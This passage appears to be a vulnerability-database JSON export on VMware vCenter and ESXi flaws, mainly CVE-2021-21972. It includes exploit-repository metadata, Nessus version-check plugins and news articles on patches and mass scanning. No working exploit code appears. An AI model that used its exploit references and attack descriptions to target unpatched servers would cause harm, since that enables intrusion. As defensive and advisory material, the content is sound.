"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-18T09:50:27", "id": "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-17T21:54:24", "description": "### VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972\n\n**zoomeye do...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T07:17:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-17T20:54:42", "id": "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-28T09:40:32", "description": "# vcenter_rce\n\u6f0f\u6d1e\u5229\u7528\uff0cVmware vCenter 6.5-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-01T14:14:01", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-04-28T02:16:46", "id": "D4220876-A611-59AE-8262-07797542DAB9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-26T14:13:10", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T11:14:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-26T08:37:20", "id": "39EADA2B-CE50-555B-910E-D3B77640C464", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-02T05:37:11", "description": "# TOP\nTOP All bugbounty pentesting CVE-2022- POC Exp Things\n## ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-19T01:54:15", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Fusion Middleware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4210", "CVE-2016-0638", "CVE-2016-3510", "CVE-2016-5195", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-3248", "CVE-2017-3506", "CVE-2018-0296", "CVE-2018-0802", "CVE-2018-0886", "CVE-2018-1002105", "CVE-2018-10933", "CVE-2018-11776", "CVE-2018-13379", "CVE-2018-13382", "CVE-2018-14847", "CVE-2018-15473", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-2894", "CVE-2018-3191", "CVE-2018-3245", "CVE-2018-3252", "CVE-2018-7600", "CVE-2018-8120", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8581", "CVE-2018-8897", "CVE-2018-9995", "CVE-2019-0192", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-1003000", "CVE-2019-1003001", "CVE-2019-1003002", "CVE-2019-1040", "CVE-2019-11043", "CVE-2019-11510", "CVE-2019-11708", "CVE-2019-11932", "CVE-2019-12586", "CVE-2019-12587", "CVE-2019-12588", "CVE-2019-1322", "CVE-2019-13272", "CVE-2019-1405", "CVE-2019-17558", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-2107", "CVE-2019-2618", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2890", "CVE-2019-3396", "CVE-2019-5736", "CVE-2019-5786", "CVE-2019-6340", "CVE-2019-9810", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-10199", "CVE-2020-10204", "CVE-2020-11444", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-1362", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-1938", "CVE-2020-2546", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-25684", "CVE-2020-25685", "CVE-2020-25686", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2915", "CVE-2020-2950", "CVE-2020-5902", "CVE-2020-6286", "CVE-2020-6287", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31166", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-3129", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-3493", "CVE-2021-4034", "CVE-2021-40444", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42278", "CVE-2021-42287", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-0185", "CVE-2022-0337", "CVE-2022-0778", "CVE-2022-0824", "CVE-2022-0847", "CVE-2022-20699", "CVE-2022-21882", "CVE-2022-21907", "CVE-2022-21971", "CVE-2022-21974", "CVE-2022-21999", "CVE-2022-22536", "CVE-2022-22947", "CVE-2022-23131", "CVE-2022-23808", "CVE-2022-24086", "CVE-2022-24112", "CVE-2022-25636", "CVE-2022-25943"], "modified": "2022-04-02T05:13:27", "id": "2C119FFA-ECE0-5E14-A4A4-354A2C38071A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2022-05-04T15:14:19", "description": "The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3n, 6.7 prior to 6.7 U3l or 7.0 prior to 7.0 U1c. It is, therefore, affected by multiple vulnerabilities, as follows:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n (CVE-2021-21972)\n\n - The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). (CVE-2021-21973)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2021-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/146826", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146826);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2021-21972\", \"CVE-2021-21973\");\n script_xref(name:\"IAVA\", value:\"2021-A-0109\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/21\");\n\n script_name(english:\"VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3n, 6.7 prior to 6.7 U3l or 7.0\nprior to 7.0 U1c. It is, therefore, affected by multiple vulnerabilities, as follows:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious\n actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the\n underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7\n before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n (CVE-2021-21972)\n\n - The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation\n of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by\n sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter\n Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2\n and 3.x before 3.10.1.2). (CVE-2021-21973)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0002.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.5 U3n, 6.7 U3l, 7.0 U1c or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21972\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Unauthenticated OVA File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\nfixes = make_array(\n '6.5', '17590285', # 6.5 U3n\n '6.7', '17137232', # Lower version for 6.7 U3l from https://kb.vmware.com/s/article/2143838\n '7.0', '17327517' # 7.0 U1c\n);\n\nport = get_kb_item_or_exit('Host/VMware/vCenter');\nversion = get_kb_item_or_exit('Host/VMware/version');\nrelease = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:\"^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$\", string:release, replace:\"\\1\");\nif (build !~ \"^[0-9]+$\") audit(AUDIT_UNKNOWN_BUILD, 'VMware vCenter 6.5 / 6.7 / 7.0');\n\nmatch = pregmatch(pattern:\"^VMware vCenter ([0-9]+\\.[0-9]+).*$\", string:version);\nif (isnull(match)) audit(AUDIT_OS_NOT, 'VMware vCenter 6.5 / 6.7 / 7.0');\n\nver = match[1];\nif (ver !~ \"^(7\\.0|6\\.(5|7))$\") audit(AUDIT_OS_NOT, 'VMware vCenter 6.5 / 6.7 / 7.0');\n\nfixed_build = int(fixes[ver]);\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nrelease = release - 'VMware vCenter Server ';\nif (build >= fixed_build)\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = '\\n VMware vCenter version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-02T13:07:43", "description": "The remote VMware ESXi host is version 6.5, 6.7 or 7.0 and is affected by a remote code execution vulnerability. OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "ESXi 6.5 / 6.7 / 7.0 RCE (VMSA-2021-0002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21974"], "modified": "2021-06-07T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_ESXI_VMSA-2021-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/146827", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146827);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/07\");\n\n script_cve_id(\"CVE-2021-21974\");\n script_xref(name:\"IAVA\", value:\"2021-A-0109\");\n\n script_name(english:\"ESXi 6.5 / 6.7 / 7.0 RCE (VMSA-2021-0002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is missing a security patch and is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 6.5, 6.7 or 7.0 and is affected by a remote code execution vulnerability. \nOpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before\nESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as\nESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote\ncode execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0002.html\");\n # https://github.com/straightblast/My-PoC-Exploits/blob/master/CVE-2021-21974.py\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?090c6180\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21974\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n# Not checking workaround https://kb.vmware.com/s/article/76372\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nfixes = make_array(\n '6.5', '17477841', # ESXi650-202102001, ESXi 6.5 P06\n '6.7', '17499825', # ESXi670-202102001, ESXI 6.7 EP18\n '7.0', '17325551' # ESXi 7.0 Update 1c\n);\n\nrel = get_kb_item_or_exit('Host/VMware/release');\nif ('ESXi' >!< rel) audit(AUDIT_OS_NOT, 'ESXi');\n\nver = get_kb_item_or_exit('Host/VMware/version');\nport = get_kb_item_or_exit('Host/VMware/vsphere');\n\nmatch = pregmatch(pattern:\"^ESXi? ([0-9]+\\.[0-9]+).*$\", string:ver);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, 'VMware ESXi', '6.5 / 6.7 / 7.0');\nver = match[1];\n\nif (ver !~ \"^(7\\.0|6\\.(5|7))$\") audit(AUDIT_OS_NOT, 'ESXi 6.5 / 6.7 / 7.0');\n\nfixed_build = int(fixes[ver]);\n\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = pregmatch(pattern:\"^VMware ESXi.*build-([0-9]+)$\", string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, 'VMware ESXi', '6.5 / 6.7 / 7.0');\n\nbuild = int(match[1]);\n\nif (build >= fixed_build) audit(AUDIT_INST_VER_NOT_VULN, 'VMware ESXi', ver + ' build ' + build);\n\nreport = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:15:42", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2022-02-14T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21972.NBIN", "href": "https://www.tenable.com/plugins/nessus/146825", "sourceData": "Binary data vmware_vcenter_cve-2021-21972.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:05", "description": "[](<https://thehackernews.com/images/-M_1KgL6tAuQ/YDYE-aJuyBI/AAAAAAAAB38/asAWmk7ZJscXPGS_gHJudw0GOAZrcEX7wCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems.\n\n\"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) in its advisory.\n\nThe vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.\n\n\"In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),\" said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.\n\n\"The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.\"\n\nWith this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, [Klyuchnikov noted](<https://swarm.ptsecurity.com/unauth-rce-vmware/>).\n\nSeparately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.\n\nThe information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.\n\n[](<https://thehackernews.com/images/-ptRHS90VS-M/YDaOLCFCy0I/AAAAAAAA3oU/eE4iu9IU3WI1xoEKlX6eypn5wcFlZWhwQCLcBGAsYHQ/s0/command.jpg>)\n\nVMware has also provided workarounds to remediate CVE-2021-21972 and CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can be found [here](<https://kb.vmware.com/s/article/82374>).\n\nIt's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product ([CVE-2021-21976](<https://www.vmware.com/security/advisories/VMSA-2021-0001.html>), CVSS score 7.2) earlier this month that could grant a bad actor with administrative privileges to execute shell commands and achieve RCE.\n\nLastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.\n\n[OpenSLP](<https://www.openslp.org/doc/html/IntroductionToSLP/index.html>) provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.\n\nThe latest fix for ESXi OpenSLP comes on the heels of a similar patch ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) last November that could be leveraged to trigger a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) in the OpenSLP service, leading to remote code execution.\n\nNot long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs [abusing](<https://twitter.com/GossiTheDog/status/1324896051128635392>) the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.\n\nIt's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to \"removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T07:54:00", "type": "thn", "title": "Critical RCE Flaws Affect VMware ESXi and vSphere Client \u2014 Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-3992", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974", "CVE-2021-21976"], "modified": "2021-02-24T17:35:31", "id": "THN:87AE96960D76D6C84D9CF86C2DDB837C", "href": "https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-dg9ULZEsvBw/YLtYdH9lzzI/AAAAAAAACwY/7b0FWkEi2AgXUuJHgibePqXxv9PEVVCsgCLcBGAsYHQ/s0/VMware-vSphere.jpg>)\n\nMalicious actors are actively mass scanning the internet for vulnerable VMware vCenter servers that are unpatched against a critical remote code execution flaw, which the company addressed late last month.\n\nThe ongoing activity was detected by Bad Packets on June 3 and corroborated [yesterday](<https://twitter.com/GossiTheDog/status/1397315303978250242/photo/2>) by security researcher Kevin Beaumont. \"Mass scanning activity detected from 104.40.252.159 checking for VMware vSphere hosts vulnerable to remote code execution,\" [tweeted](<https://twitter.com/bad_packets/status/1400519385194766336>) Troy Mursch, chief research officer at Bad Packets.\n\nThe development follows the publication of a 